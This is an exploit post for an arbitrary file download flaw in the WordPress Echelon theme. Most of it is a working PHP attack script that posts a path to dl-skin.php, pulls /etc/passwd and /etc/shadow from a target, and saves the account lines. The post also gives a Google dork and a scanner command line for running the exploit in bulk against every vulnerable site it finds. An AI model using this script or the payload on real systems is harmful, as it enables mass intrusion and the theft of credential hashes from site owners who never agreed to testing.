WordPress A.F.D. Theme Echelon Arbitrary File Download

`*Name:*  
Wordpress A.F.D Theme Echelon / INURL - BRASIL  
  
*Description:*  
This exploit allows attacker to download any writable file from the server  
  
*Usage info:*  
Put the path of the file in the file's field of the exploit ,then click  
"Download" button then you get the file directly  
  
File download /etc/passwd & /etc/shadow  
  
Failure consists of exploring a parameter $ _POST file  
/wp-content/themes/echelon/lib/scripts/dl-skin.php  
  
The following fields are exploited for Arbitrary File Download  
*POST:*  
_mysite_download_skin={$config['file']}&submit=Download  
ex:  
_mysite_download_skin=/etc/passwd&submit=Download  
  
*Exploit:*  
  
  
  
<?php  
  
#===============================================================================  
# NAME: Wordpress A.F.D Theme Echelon  
# TIPE: Arbitrary File Download  
# Google DORK: inurl:/wp-content/themes/echelon  
# Vendor: www.wordpress.org  
# Tested on: Linux  
# EXECUTE: php exploit.php www.alvo.com.br  
# OUTPUT: EXPLOIT_WPAFD_Echelon.txt  
# AUTOR: Cleiton Pinheiro  
# Blog: http://blog.inurl.com.br  
# Twitter: https://twitter.com/googleinurl  
# Fanpage: https://fb.com/InurlBrasil  
# GIT: https://github.com/googleinurl  
# YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA  
#  
#  
------------------------------------------------------------------------------  
# Comand Exec Scanner INURLBR:  
# ./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s  
save.txt --comand-all "php exploit.php _TARGET_"  
#  
------------------------------------------------------------------------------  
# Download Scanner INURLBR:  
# https://github.com/googleinurl/SCANNER-INURLBR  
#===============================================================================  
  
error_reporting(1);  
set_time_limit(0);  
ini_set('display_errors', 1);  
ini_set('max_execution_time', 0);  
ini_set('allow_url_fopen', 1);  
ob_implicit_flush(true);  
ob_end_flush();  
print empty($argv[1]) ? exit('0x[ERROR]: DEFINA URL / Execute: php  
exploit.php www.alvo.com.br') : NULL;  
$argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://  
{$argv[1]}";  
!(preg_match_all("#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i",  
$argv[1], $alvo_)) ? exit('0x[ERROR]: DEFINA URL / Execute: php exploit.php  
www.alvo.com.br') : NULL;  
$config['line'] =  
"\n------------------------------------------------------------------------------------------------------------------\n";  
$config['alvo'] = $alvo_[0][0];  
$config['exploit'] = "/wp-content/themes/echelon/lib/scripts/dl-skin.php";  
  
function __plus() {  
  
ob_flush();  
flush();  
}  
  
function __convertUrlQuery($query) {  
  
$queryParts = explode('&', $query);  
$params = array();  
foreach ($queryParts as $param) {  
$item = explode('=', $param);  
$params[$item[0]] = urlencode($item[1]);  
}  
  
return $params;  
}  
  
function __request_info($curl, $config) {  
$postDados =  
__convertUrlQuery("_mysite_download_skin={$config['file']}&submit=Download");  
foreach ($postDados as $campo => $valor) {  
$postDados_format .= $campo . '=' . ($valor) . '&';  
}  
  
$postDados_format = rtrim($postDados_format, '&');  
curl_setopt($curl, CURLOPT_POST, count($postDados));  
curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format);  
curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']);  
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0  
(X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/'  
. md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/'  
. rand(1, 500) . '.31');  
curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] .  
$config['exploit']);  
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);  
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);  
curl_setopt($curl, CURLOPT_HEADER, 1);  
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);  
$corpo = curl_exec($curl);  
$server = curl_getinfo($curl);  
$status = NULL;  
preg_match_all('(HTTP.*)', $corpo, $status['http']);  
preg_match_all('(Server:.*)', $corpo, $status['server']);  
preg_match_all('(Content-Disposition:.*)', $corpo,  
$status['Content-Disposition']);  
$info = str_replace("\r", '', str_replace("\n", '',  
"{$status['http'][0][0]}, {$status['server'][0][0]}  
{$status['Content-Disposition'][0][0]}"));  
curl_close($curl);  
unset($curl);  
return isset($corpo) ? array('corpo' => $corpo, 'server' => $server,  
'info' => $info) : FALSE;  
}  
  
function main($config,$rest) {  
  
__plus();  
print "0x " . date("h:m:s") . " [INFO][EXPLOITATION THE FILE]:  
{$config['file']}:\n";  
preg_match_all("(root:.*)", $rest['corpo'], $final);  
preg_match_all("(sbin:.*)", $rest['corpo'], $final__);  
preg_match_all("(ftp:.*)", $rest['corpo'], $final___);  
preg_match_all("(nobody:.*)", $rest['corpo'], $final____);  
preg_match_all("(mail:.*)", $rest['corpo'], $final_____);  
$_final = array_merge($final[0], $final__[0], $final___[0],  
$final____[0], $final_____[0]);  
$res = NULL;  
if (preg_match("#root#i", $rest['corpo'])) {  
$res.= "0x " . date("h:m:s") . " [INFO][IS  
VULN][RESUME][VALUES]:\n";  
$res.=$config['line'] . "\n";  
foreach ($_final as $value) {  
$res.="0x " . date("h:m:s") . " [VALUE]: $value\n";  
}  
$res.=$config['line'];  
__plus();  
file_put_contents('EXPLOIT_WPAFD_Echelon.txt',  
"{$config['alvo']}\n{$res}\n", FILE_APPEND);  
print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n";  
} else {  
  
print "0x " . date("h:m:s") . " [INFO][NOT VULN]\n";  
}  
}  
print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL -  
BRASIL\n";  
$config['file'] = '/etc/passwd';  
$rest = __request_info($objcurl = curl_init(), $config);  
__plus();  
print $line;  
print "0x " . date("h:m:s") . " [INFO]: {$rest['info']}\n";  
print "0x " . date("h:m:s") . " [INFO][TARGET]: {$config['alvo']}\n";  
main($config,$rest);  
__plus();  
$config['file'] = '/etc/shadow';  
$rest = __request_info($objcurl = curl_init(), $config);  
__plus();  
main($config,$rest);  
__plus();  
`